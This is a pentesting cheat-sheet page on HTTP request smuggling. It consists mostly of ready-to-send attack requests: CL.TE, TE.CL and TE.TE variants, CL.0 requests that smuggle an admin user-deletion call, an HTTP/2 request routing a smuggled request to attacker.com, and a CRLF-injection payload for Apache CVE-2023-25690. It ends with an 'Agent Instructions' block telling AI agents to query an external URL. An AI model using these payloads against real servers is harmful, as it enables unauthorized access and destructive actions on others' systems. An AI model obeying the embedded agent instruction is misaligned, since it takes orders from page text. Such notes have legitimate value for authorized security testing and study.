# HTTP Request Smuggling
### [Investigation](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#investigation)
Assume the website has the following HTTP specification.
```bash
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=admin&password=admin
Copied!
```
If we change **"Content-Length"** to **"Transfer-Encoding"** as follow, the data is sent in chunks to server. Each chunk consists of the chunk size in bytes (it is expressed in hexadecimal).
The message is terminated with a chunk of size zero.
```bash
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
1d
username=admin&password=admin
0
Copied!
```
By the way, **Transfer-Encoding** header is not allowed in **HTTP/2**.
### [Exploitation Automatically](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation-automatically)
BurpSuite has the useful extension **“HTTP Request Smuggler”**.
### [CL.TE (Content-Length . Transfer-Encoding)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#cl.te-\(content-length-.-transfer-encoding\))
The front-end server uses “Content-Length” header and the back-end server uses “Transfer-Encoding” header.
Send the following request twice.
```bash
POST /item HTTP/1.1
Host: example.com
Content-Length: 9
Transfer-Encoding: chunked
0
EVIL
Copied!
```
If the response delays, we may be able to request smuggling.
#### [Exploitation](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation)
The front-end server uses the “Content-Length” header, so
```bash
POST /item HTTP/1.1
Host: example.com
Content-Length: 9
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: example.com
Foo: xGET / HTTP/1.1
Host: example.com
Copied!
```
### [TE.CL (Transfer-Encoding . Content-Length)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#te.cl-\(transfer-encoding-.-content-length\))
The front-end server uses **“Trans-Encoding”** header and the back-end server uses **“Content-Length”** header.\
Send the following request twice.
If you use BurpSuite, check the **“Update Content-Length”** option is unchecked to avoid BurpSuite automatically changes the Content-Length depending on data sent.
```bash
POST HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-Encoding: chunked
4
EVIL
0
Copied!
```
If the response delays, we may be able to request smuggling.
#### [Exploitation](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation-1)
Send the following request twice.
```bash
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Copied!
```
### [TE.TE (Transfer-Encoding . Transfer-Encoding)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#te.te-\(transfer-encoding-.-transfer-encoding\))
Both the front-end server and the back-end server support the **“Transfer-Encoding”** header but one of the servers can be induced not to process it by obfuscating the header.
```bash
Transfer-Encoding: xchunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Copied!
```
### [CL.0 (Content-Length: 0)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#cl.0-\(content-length%3A-0\))
If the target website ignores the Content-Length, you’re able to access the restricted page by request smuggling.
#### [1. Prepare the Two Same Requests](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#1.-prepare-the-two-same-requests)
If you're using Burp Suite, send the target request to **Repeater** twice.
#### [2. Change the First Request to POST Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#2.-change-the-first-request-to-post-request)
#### [3. Set the "Content-Length: 0" in the First Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#3.-set-the-%22content-length%3A-0%22-in-the-first-request)
#### [4. Set the "Connection: keep-alive" in the First Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#4.-set-the-%22connection%3A-keep-alive%22-in-the-first-request)
Now two requests should look like:
```sh
# Request 1
POST / HTTP/1.1
Host: example.com
Cookie: key=value
Connection: keep-alive
Content-Length: 0
GET /admin/delete?username=john
Foo: x
# -------------------------------------------------
# Request 2
GET / HTTP/1.1
Host: example.com
Cookie: key=value
Connection: close
Copied!
```
#### [5. Send Requests in Order](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#5.-send-requests-in-order)
First off, if you're using Burp Suite, note that **enabling the "Update Content-Length" in the Burp Repeater option.** The sequence is Request 1 -> Request 2.
### [HTTP/2 CL.0 (Content-Length: 0)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#http%2F2-cl.0-\(content-length%3A-0\))
#### [1. Prepare Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#1.-prepare-request)
If you're using Burp Suite, note that **disable "Update Content-Length" and enable "Allow HTTP/2 ALPN override" in the Burp Repeater option.**
The request shoud look like:
```sh
POST / HTTP/2
Host: example.com
Content-Length: 0
GET /exploit HTTP/1.1
Host: attacker.com
Content-Length: 5
x=1
Copied!
```
#### [2. Send Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#2.-send-request)
Before doing, don't forget to **expand the Inspector on the right in the Repeater and select "HTTP/2".**\
Now send the request a few times.
### [mod\_proxy Misconfiguration on Apache ≥2.4.0, 2.4.55≤(CVE-2023-25690)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#mod_proxy-misconfiguration-on-apache-%E2%89%A52.4.0%2C-2.4.55%E2%89%A4\(cve-2023-25690\))
Reference:
If target web server allows any characters (`.*`) in `RewriteRule`, it causes HTTP request smuggling.
```bash
RewriteEngine on
RewriteRule "^/products/(.*)" "http://127.0.0.1:8080/?productId=$1" [P]
ProxyPassReverse "/" "http://127.0.0.1:8080:/"
Copied!
```
#### [Send Request with CRLF (`\r`) Injection](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#send-request-with-crlf-\(%5Cr%5Cn\)-injection)
```bash
GET /products/1%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
# It means the following:
#
# GET /products/1 HTTP/1.1
# Host: 127.0.0.1
#
# GET /SMUGGLED HTTP/1.1
Copied!
```
### References
*
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://morgan-bin-bash.gitbook.io/pentesting/http-request-smuggling.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.